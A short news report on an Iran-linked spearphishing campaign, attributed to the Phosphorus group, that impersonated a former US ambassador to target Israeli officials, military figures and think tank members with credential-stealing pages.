An alleged group of Iranian hackers has been operating a spearphishing campaign that includes masquerading known government officials. Based on reports, the Iran-sponsored threat group posed as a former United States ambassador to target think tank officials.
The malicious threat actors could obtain initial access to one of its two targeted email boxes through phishing messages from an alleged US ambassador by tracing an original email thread.
The Iranian hackers have made a target list that includes Israeli officials, the head of a leading security think tank, the former US ambassador to Israel, and high-ranking military personnel.
Additionally, the researchers have specified some hacker targets such as Tzipi Livni, a former Israeli deputy prime minister and foreign minister, an unidentified retired Israeli major general, a senior executive in the Israeli defence industry, and a member of one of Israel’s leading security think tanks.
A former member of a famous Middle Eastern research centre and an unnamed previous US ambassador in Israel were also included by the Iranian hackers on the target list of the Iranian group.
The Iranian hackers used fake and authentic email accounts to conduct spearphishing attacks.
The Iranian hackers’ campaign included spearphishing attacks using phoney and legitimate accounts. They also utilised URL shorteners and a credential-stealing Yahoo-themed phishing webpage.
Furthermore, the campaign used an authentic document verification service to acquire their target’s passport scans or IDs. Another part of the attack is using a credential-stealing page disguised as an invite to a well-known roundtable meeting.
Reports in Israel assumed that the illegal activities could be the doing of the Phosphorus group, an Iranian government-affiliated cyberespionage gang. Phosphorus is known as Newscaster Team, Magic Hound, Charming Kitten, and APT35.
The attribution is based on the attack’s primary targets, commented-out code from a previous Phosphorus campaign, and an Iranian-IP address in the source code of the Yahoo phishing page. The uncovered spearphishing infrastructure exclusively attacks the high-ranking officials in Israel and worsens as the tension between Iran and Israel continues.